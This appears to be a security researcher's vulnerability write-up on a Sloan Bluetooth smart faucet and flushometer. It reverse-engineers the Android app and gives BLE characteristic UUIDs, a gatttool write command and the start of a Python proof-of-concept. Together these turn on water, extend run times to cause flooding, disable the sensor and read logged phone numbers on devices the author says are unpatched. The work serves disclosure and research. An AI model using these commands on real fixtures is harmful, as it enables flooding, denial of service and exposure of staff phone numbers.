handle = 0x0004, char properties = 0x02, char value handle = 0x0005, uuid = 00002a01–0000–1000–8000–00805f9b34fb
handle = 0x00db, char properties = 0x08, char value handle = 0x00dc, uuid = f7bf3564-fb6d-4e53–88a4–5e37e0326063
handle = 0x00de, char properties = 0x04, char value handle = 0x00df, uuid = 984227f3–34fc-4045-a5d0–2c581f81a153

Once we reverse the Android app, we can hopefully find variable names that reference these UUIDs and determine their function.

One thing I’ve noticed while doing this is that the device seems to stop beaconing every so often, and I need to either press a button on it OR wait a bit OR unseat and reseat the batteries. It’s possible that it limits connections over a period of time.

Let’s take a look back at the app.

SmartConnect Again

After pulling the app off of my phone using adb and then reversing it with jadx, I start searching for interesting bits. The first one to jump out was:

public final void dispenseWater() {
    if (getMainViewModel().getConnectionState().getValue() == ConnectionState.CONNECTED) {
getMainViewModel() .getConnectionState() .setValue (ConnectionState.DISPENSING_WATER);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = getMainViewModel().getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE));
        if (bluetoothGattCharacteristic != null) {
bluetoothGattCharacteristic.setValue(""1"");
        }
        FragmentActivity activity = getActivity();
        if (activity != null) {
            BluetoothLeService bluetoothLeService = ((MainActivity) activity).getBluetoothLeService();
            if (bluetoothLeService != null) {
bluetoothLeService. writeCharacteristic(bluetoothGattCharacteristic);
                return;
            }
            return;
        }
        throw new TypeCastException(""null cannot be cast to non-null type com.smartwave.sloanconnect.MainActivity"");
    }
}

Seems like it’ll be pretty easy to make this thing flow. Now we just need to figure out the BLE characteristic UUID referenced by UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. This is made incredibly easy thanks to a nice table of UUID variables.

public static final String UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = “d0aba888-fb10–4dc9–9b17-bdd8f490c954”;
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92a”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLUSH_ON_OFF = “d0aba888-fb10–4dc9–9b17-bdd8f490c946”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c942”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_STATISTICS_INFO_NUMBER_OF_ALL_FLUSHES = “d0aba888-fb10–4dc9–9b17-bdd8f490c916”;
public static final String
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = “f89f13e7–83f8–4b7c-9e8b-364576d88334”;
public static final String
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = “f89f13e7–83f8–4b7c-9e8b-364576d88361”;

Wow. In addition to finding our water dispensing UUID, there are a lot of other interesting variable names. A select few of ~100 are shown above. It looks like this thing supports over-the-air (OTA) firmware updates, tons of diagnostic and sensor settings, possible security settings, and more.

Now that we know the UUID that turns on the water, let’s use NRF Connect to see what we can do. I’m switching over to NRF Connect from gatttool because it handles the connection easily. Since the faucet seems to ‘time out’ or disallow connections after a period of time, this is useful so we don’t lose our connection and reset everything.

The faucet’s BLE advertising information
nRF Connect for Desktop showing the faucet’s Services

In the decompiled ‘dispenseWater()’ function above, we saw that the function basically sends a ‘1’ to the UUID stored in the variable UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. Luckily we can find the UUID in the table we found:

public static final String UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = “d0aba888-fb10–4dc9–9b17-bdd8f490c965”;

Cool. Let’s write to that UUID. The default value is 30, so, ‘0’ in ASCII. Let’s write 31, or ‘1’, since that’s what the code does. I tried writing other numbers first but nothing else did anything, until…

nRF Connect view showing flow being enabled.

I barely refrained from yelping for joy when I heard the faucet’s telltale ‘click’ indicating the spigot had activated. Since the faucet isn’t hooked up to a water source (hey, i’m not a plumber), you’ll have to bear with the above anti-climactic demo.

We should be able to do this with gatttool via:

$ sudo gatttool -b 08:6B:D7:20:00:01 — char-write-req -a 0x00b3 -n 31

Flush Toilet

Although I don’t have a smart Flushometer, it works very similarly to the faucet. We can see the code for “flushToilet()” is almost identical:

public static final void flushToilet(BluetoothLeService bluetoothLeService, MainViewModel mainViewModel) {
    Intrinsics.checkParameterIsNotNull(bluetoothLeService, "$this$flushToilet");
    Intrinsics.checkParameterIsNotNull(mainViewModel, "mainViewModel");
    if (mainViewModel.getConnectionState().getValue() != ConnectionState.FLUSHING_TOILET) {
        mainViewModel .getConnectionState() .setValue(ConnectionState.FLUSHING_TOILET);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = mainViewModel.getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE));
        if (bluetoothGattCharacteristic != null) {
            bluetoothGattCharacteristic.setValue("1");
        }
        bluetoothLeService .writeCharacteristic(bluetoothGattCharacteristic);
    }
}

And we can look up the UUID for the flush variable:

public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = “f89f13e7–83f8–4b7c-9e8b-364576d88361”;

Even though I don’t intend to acquire a smart Flushometer, I can confidently say I know what’s happening here.

Unlock Key

There seems to be a concept of an unlock key in the android app.

public final void setGattCharacteristics(List<? extends BluetoothGattService> list) {
    DeviceData value;
    if (list != null) {
        for (T t : list) {
            Timber.i(“Service: “ + t.getUuid(), new Object[0]);
            List<BluetoothGattCharacteristic> characteristics = t.getCharacteristics();
            Intrinsics .checkExpressionValueIsNotNull(characteristics, “service.characteristics”);
            for (T t2 : characteristics) {
                Map<UUID, BluetoothGattCharacteristic> map = this.gattCharacteristics;
                Intrinsics.checkExpressionValueIsNotNull(t2, “characteristic”);
                UUID uuid = t2.getUuid();
                Intrinsics.checkExpressionValueIsNotNull(uuid, “characteristic.uuid”);
                map.put(uuid, t2);
                if (Intrinsics.areEqual(t2.getUuid(), UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY)) && (value = this.activeDeviceData.getValue()) != null) {
                    value.setHasSecurity(true);
                }
            }
        }
    }
}

The setGattCharacteristics function is called on connection to build the list of services and characteristics. Here, if there’s an unlock key set, the app marks a ‘security’ value as true. Later on this value is checked when a few functions are called, but so far it looks like it just appends some notes if it is set. In a few scenarios, a beginSecurityProtocol() function is called, and it will read a ‘note’ from the device if security is enabled. This ‘note’ can be used to store the phone number of the last person to change the setting. The security function seems to be more of a way to keep some data about what happened than any sort of actual security.

Flow Rate

The app has two different sets of code to protect flow rate from being set too high, depending on if we’re using Liters or Gallons.

if (doubleOrNull != null) {
    d = doubleOrNull.doubleValue();
}
if ((valueOf.length() == 0) || d < 1.3d) {
    d = 1.3d;
} else if (d > 9.9d) {
    d = 9.9d;
}
#OR:
if ((valueOf.length() == 0) || d < 0.3d) {
    d = 0.3d;
} else if (d > 2.6d) {
    d = 2.6d;
}

Since this is implemented in the app, I’ll bet the faucet has a much wider range. Of course, flow rate is governed by whatever the line in can support (I’m not a plumber). Flow rate is governed by d0aba888-fb10–4dc9–9b17-bdd8f490c949 characteristic.

Flow Rate Value

It seems floats are written to the characteristic as two characters, in this case, 1 and 9 (1.9), which is one of the liters per minute (LPM) options. Let’s see what we can set it to.

So, we can’t set it to a 3 byte value, but we can set it to 0x3939 (9.9), and that seems to be the highest value to have any effect. Of note, we can also set it to even higher values like 0xFF39, and while that doesn’t seem to do anything, it still feels like a value that shouldn’t be allowed by logic on the device. Since I don’t have the faucet hooked up, I can’t test what happens when we set the flow rate really high (again, not a plumber). When it’s set to FF39, the app tries to display it as 0.0. And, we can set it to 9.9 via the app. So, Unless we plug this thing into a water line, we’re not gonna know what happens with the FF39.

Activation Mode

“Activation Mode” controls how long water flows for when the IR sensor is triggered. We can set it up to 120 seconds via the app. We’re all washing our hands a lot longer during covid, but I know I can sing happy birthday to myself 2 or three times and still be under that 2 minute mark. Can we set it higher and cause the faucet to flow for a really long time?

There are two types of Activation Mode: Metered and On Demand. What’s the difference between them? Surely the internet will tell me.

A Google Play Store comment indicating confusion on Metered and On Demand flow rate

Nope, no luck there. There are a few variable definitions that may give us a clue. Could that On Demand value be a mistake, off by an order of magnitude?

public final class ActivationModeFragmentKt {
    private static final int METERED_MAX_VALUE = 120;
    public static final int METERED_MODE = 1;
    private static final int MIN_VALUE = 3;
    private static final int ON_DEMAND_MAX_VALUE = 1200;
    public static final int ON_DEMAND_MODE = 0;
}

Unfortunately those safeguards don’t seem to be set anywhere else. Let’s see if we can find the code that controls this. Two different characteristics control the run times for the different modes.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = “d0aba888-fb10–4dc9–9b17-bdd8f490c945”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = “d0aba888-fb10–4dc9–9b17-bdd8f490c944”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = “d0aba888-fb10–4dc9–9b17-bdd8f490c943”;
Flow Rate characteristics and values

And we can see how these are set on the device. I’m going to go ahead and assume that everything on this device is written as ascii. So, Mode is set to 0x30 == “0”, which we can see is ON_DEMAND_MODE. And then the Metered Run Time is set to 120 seconds, and On Demand is set to 30 seconds. Cool. Let’s see how high we can go. This is going to be painful, waiting for many minutes for this thing to turn back off.

The On Demand characteristic set to 1130 seconds

Ok, we’ve set the On Demand time to 1130 seconds, so, about 18 minutes. I wave my hand in front of the faucet’s IR sensor, and grab a cup of coffee. This is gonna take a while…. That didn’t work. It shut off quickly. There must be some internal idea of how long is too long. I’ll flip the mode to metered and set that pretty high. Seems metered won’t take more than 3 bytes, so I’ll set the first one to 9 for 920 seconds, or ~15 minutes. And then I’ll wait.

Metered Mode set to 920 seconds

It’s still going. There’s gotta be a better way to test. Currently, I wave my hand in front of the sensor once to engage the faucet, and then try periodically over the timer duration. It won’t make the click of engagement until the time is up. So, the next time I can wave my hand in front of the sensor and hear a click, I know the faucet’s timer has ended. This won’t be incredibly accurate or scientific. I set a 14 min timer and walked away. Annnnd somehow I walked right back in at the 15 minute mark and heard it click off. So, the highest value we can likely set for Metered mode is 999, which is 16.65 minutes. That’s a long time to leave the tap on. I wonder who would want to do something like that…

Wet Bandits — Be on the lookout — These criminals are armed and clumsy

DoS

In addition to causing a flood, we can trigger the opposite effect. It’s possible to disable the faucet’s sensor completely by setting the Sensor Range to 0. Now, the faucet won’t turn on no matter how close our hand gets or how vigorously we wave. In this case, we can simply send an 0x30 to UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE.

Model and Version

It’s also possible to read the model and version number via these characteristics. Nothing super exciting here, but could be useful if we were trying to find a specific version. Most BLE enabled devices will expose these via the “Device Information” service. These are separate from that and something Sloan must have thought necessary.

Firmware & Hardware
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c906”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c905”;

Firmware: 0109

Hardware: 0175

Logged Phone Numbers

The “security” mode of the faucet logs the phone number stored in the app for certain events.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c932”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c930”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92e”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92f”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = “d0aba888-fb10–4dc9–9b17-bdd8f490c929”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92b”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92a”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92c”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92d”;
Phone numbers stored on faucet

I’ve conveniently set these to the Tenable support number 855–267–7044. In a real setup, this would be the phone number registered in the app that performed each specific task update. I attempted to see how wide the field was, and got up to 15 characters before it wouldn’t take any more.

It doesn’t seem like the app is parsing anything in the text fields, so no XSS that I can find.

The other interesting thing here is that any time someone makes a change to the faucet, the app causes their phone number to be stored on the faucet. This is then reflected back to any app that connects OR anyone that reads the characteristic. This isn’t mentioned in the app and I don’t see a privacy policy. Does GDPR apply to bathroom fixtures?

Aquis Dongle

What is Aquis? I don’t know. But there are several characteristics in the app for an Aquis Dongle. Could this be a new product line? A partnership with another company that this app will work with?

public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c90e”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c90d”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = “d0aba888-fb10–4dc9–9b17-bdd8f490c90c”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = “d0aba888-fb10–4dc9–9b17-bdd8f490c90b”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = “d0aba888-fb10–4dc9–9b17-bdd8f490c90F”;

There does seem to be a company called Aquis that offers connected faucets. Perhaps they’re one of Sloan’s partners or produced the tech for Sloan.

Aquis Multifunctional Faucet feature sheet

That ‘optional service APP’ sounds just like what we’re looking at.

OTA Firmware Update

The service UUID 1d14d6ee-fd63–4fa1-bfa4–8f47b42119f0 maps to the variable name UUID_SERVICE_OTA in our variable definitions file. Indeed, a quick search reveals this to be Silicon Labs OTA service, giving us insight, also, into the chipset used here. We’ll have to dig into this.

OTA means “Over-The-Air” and is the method to write firmware to various BLE chipsets. As far as I can tell, the different major chipset manufacturers each have their own OTA spec, and they are not interoperable even if they’re called the same thing. Therefore it can be helpful to have chipset specific tools to manipulate OTA. There are often various levels of security that can be added by the developer, including checking firmware signatures or not.

Silicon Labs Gecko bootloader has 3 optional settings for secure firmware update:

  • Require signed firmware upgrade files.
  • Require encrypted firmware upgrade files.
  • Enable secure boot.

Silicon Labs defines these as:

  • Secure Boot refers to the verification of the authenticity of the application image in main flash on every boot of the device.
  • Secure Firmware Upgrade refers to the verification of the authenticity of an upgrade image before performing a bootload, and optionally enforcing that upgrade images are encrypted.

If none of those are selected by the developer, it’s possible to write any firmware to the device. As the faucet was quite expensive, I did not test firmware update and am merely pointing out that it’s exposed.

Using one of the SILabs android apps, we can quickly see that it’s possible to do an OTA firmware update. No telling what the firmware in place is checking for. I don’t want to break this thing yet.

I also grepped through the android apk but don’t see anything that references the three OTA variable names. I guess they’ll implement updates in the future. This makes me think that the OTA feature uses stock code from the SDK.

Hardware — BLE Adapters

These vulns should be exploitable via any BLE adapter, but since hardware can be finicky, the specific adapters I tested with are:

Cyberkinetic Effects or Why should I even care

Sure, turning on the water might not be the next million dollar ransomware campaign, and flushing the toilets remotely seems like a great prank, but not much more. Still, there can be real interesting effects. First off, these faucets aren’t usually for home use, but installed in office buildings, in groups. Turning on all of the faucets repeatedly or flushing all of the toilets could possibly cause a flooding condition. Move over SYN flood, this is a sink flood.

But these devices aren’t networked! They have no IP! They’re limited by range! These are great points. However, the faucet likely has a 30 foot BLE range. This is well within range of some miscreant standing at their local donut shop near the office. A neighboring unit in a condo or apartment building would also be well within range. Also, most laptops and desktops include bluetooth adapters, so any malware infection is a potential vector. I always like to point out that a BLE device is only a hop away from any modern laptop.

Findings

Enable Water Dispense > Kinetic Effect, Change Flow Rate > Kinetic Effect, Change Activation Mode / Time > Kinetic Effect / DoS, Change Sensor Range to 0 > DoS, Maintenance Person Cell Phone Number Modification and Disclosure > Information Leakage, Enable Toilet Flush > Kinetic Effect, Model Number is writable > Modification of Assumed Immutable Data

PoC || GTFlow

Here’s a quick proof of concept in case you’ve got an unpatched faucet or flushometer lying around. As of this posting, Sloan has not responded to our disclosure emails and to our knowledge has not released an update.

from bluepy.btle import Scanner, DefaultDelegate, Peripheral, UUID, BTLEDisconnectError, BTLEGattError, BTLEManagementError, BTLEInternalError
SCAN_TIMEOUT = 2.0
DEBUG = 0
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c965")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c949")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c945");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c944");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c943");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c942");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c906");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c905");
UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER = UUID("00002a24-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c932");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c930");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92e");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92f");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c929");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92b");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92a");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92c");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92d");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88338");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88337");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88335");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88331");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88336");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88334");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88333");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88332");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90e");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90d");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90c");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90b");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90F");
AQUIS_UUIDS = (
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU
)
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c953");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c954");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c951");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c952");
LOCK_INFO = (
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY,
)
FAUCET_PHONE_UUIDS = (
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,

)
UUID_CHARACTERISTIC_OTA_CONTROL = UUID("f7bf3564-fb6d-4e53-88a4-5e37e0326063");
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER = UUID("984227f3-34fc-4045-a5d0-2c581f81a153");
OTA = (
UUID_CHARACTERISTIC_OTA_CONTROL,
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER,
)
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94a");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94b");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94c");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94d");
NOTES = (
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4,
)
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c969");
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c968");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c967");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c961");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c962");
